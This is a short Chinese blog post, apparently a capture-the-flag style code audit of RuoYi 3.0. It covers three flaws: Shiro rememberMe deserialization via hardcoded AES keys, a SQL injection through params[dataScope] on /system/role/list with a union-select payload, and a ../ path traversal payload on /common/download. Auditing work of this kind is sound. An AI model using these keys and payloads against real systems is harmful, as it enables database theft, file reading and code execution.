【代码审计】RuoYi-3.0 三处安全问题分析

目录

Shiro反序列化

SQL注入

任意文件下载


Shiro反序列化

看到pom.xml里有1.4.0的Shiro依赖

可以打Shiro反序列化

Shiro Remember Me 的生成机制,就是把用户信息序列化成字节,然后用AES加密,最后Base64编码,放到Cookie里。

详细拆解三步:

  1. 序列化: 将用户的登录信息(如用户名)通过 Java原生序列化 变成二进制字节流。

  2. 加密: 使用 AES-128-CBC 模式,配合一个 硬编码的默认密钥 (如 kPH+bIxk5D2deZiIxcaaaA==)对这个字节流进行加密。

  3. 编码: 将加密后的字节进行 Base64编码 ,最终得到 rememberMe Cookie的值。

硬编码了密钥,拿到密钥后即可用任意恶意序列化数据进行Remember Me字段构造

复制代码
fCq+/xW488hMTCD+cmJ3aQ==

直接一把梭了

SQL注入

Ruoyi操作数据库用的是MyBatis

全局搜${

${params.dataScope}可以被注入

全局搜selectRoleList

发现最终是被/system/role/list去调用

顾名思义这个接口功能点在这

params是个数组

我们可以这样传参

复制代码
roleName=111&roleKey=111&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and 1=2
union select 1,2,3,4,5,6,7,concat(0x7e,(select database()),0x7e),9&pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc

成功查询到数据库名为ry

任意文件下载

全局搜/download

逻辑很简单,就是接收一个可控的filename参数,然后对返回的文件名做一些随机化处理

将指定文件内容返回回来

payload:

复制代码
/common/download?filename=../../../../../../flag.txt
相关推荐
程序员游老板1 分钟前
基于SpringBoot3+vue3的爱心陪诊平台
java·spring boot·毕业设计·软件工程·课程设计·信息与通信
期待のcode3 分钟前
Springboot核心构建插件
java·spring boot·后端
遥不可及~~斌6 分钟前
Java 面试题集 -- 001
java·开发语言
C1829818257535 分钟前
HttpURLConnection 与其他客户端关系
java
通往曙光的路上1 小时前
发邮件1、创建邮箱
java
听*雨声1 小时前
03_软考_网络安全
安全·web安全
麦麦鸡腿堡2 小时前
Java_类的加载
java·开发语言
JIngJaneIL2 小时前
基于java + vue校园快递物流管理系统(源码+数据库+文档)
java·开发语言·前端·数据库·vue.js
超级大只老咪2 小时前
数组的正向存储VS反向存储(Java)
java·开发语言·python